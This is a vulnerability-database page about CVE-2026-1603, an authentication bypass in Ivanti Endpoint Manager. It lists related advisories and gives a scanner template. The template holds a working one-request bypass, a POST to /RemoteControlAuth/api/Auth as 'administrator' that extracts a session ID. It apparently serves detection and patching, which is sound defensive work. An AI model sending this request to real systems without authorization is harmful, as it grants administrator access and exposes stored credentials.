| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| The vulnerability of the Ivanti Endpoint Manager software management tool relates to bypassing authentication by using an alternative path or channel. This allows a perpetrator to disclose authentication credentials. | 16 Feb 202600:00 | – | bdu_fstec | |
| CVE-2026-1603 | 10 Feb 202616:17 | – | circl | |
| Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability | 9 Mar 202600:00 | – | cisa_kev | |
| CISA Adds Three Known Exploited Vulnerabilities to Catalog | 9 Mar 202612:00 | – | cisa | |
| Ivanti Endpoint Manager 安全漏洞 | 10 Feb 202600:00 | – | cnnvd | |
| CVE-2026-1603 | 10 Feb 202615:09 | – | cve | |
| CVE-2026-1603 | 10 Feb 202615:09 | – | cvelist | |
| Security Advisory EPM February 2026 for EPM 2024 | 9 Feb 202620:55 | – | ivanti | |
| Ivanti Endpoint Manager < 2024 SU5 Multiple Vulnerabilities | 13 Feb 202600:00 | – | nessus | |
| Vulnerabilities fixed in Ivanti Endpoint Manager | 10 Mar 202614:20 | – | ncsc |
id: CVE-2026-1603
info:
name: Ivanti Endpoint Manager - Authentication Bypass
author: DhiyaneshDk,watchtowrlabs
severity: high
description: |
Ivanti Endpoint Manager < 2024 SU5 contains an authentication bypass caused by improper access control, letting remote unauthenticated attackers leak stored credential data, exploit requires no special privileges.
impact: |
Remote attackers can leak stored credential data, potentially compromising sensitive information.
remediation: |
Update to version 2024 SU5 or later.
reference:
- https://x.com/watchtowrcyber/status/2022305033086235108/photo/1
- https://hub.ivanti.com/s/article/Security-Advisory-EPM-February-2026-for-EPM-2024
- https://nvd.nist.gov/vuln/detail/CVE-2026-1603
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
cve-id: CVE-2026-1603
cwe-id: CWE-288
epss-score: 0.81089
epss-percentile: 0.99587
cpe: cpe:2.3:a:ivanti:endpoint_manager:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: ivanti
product: endpoint_manager
tags: cve,cve2026,api,auth,ivanti,epmm,authbypass,vkev,kev
http:
- raw:
- |
POST /RemoteControlAuth/api/Auth HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"logintype":"64",
"username":"administrator"
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"sessionid":'
- type: word
part: body
words:
- '"sessionid": null'
negative: true
- type: status
status:
- 200
extractors:
- type: json
part: body
name: sessionid
json:
- '.sessionid'
# digest: 4a0a00473045022100d7fb4eb2681f7740fd5685dc96c64230539dbe863ba7ace2a3b874560129a21a0220268b463ae88d301c3f1651ab95a290a48437135a74928643712c533573ceffce:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation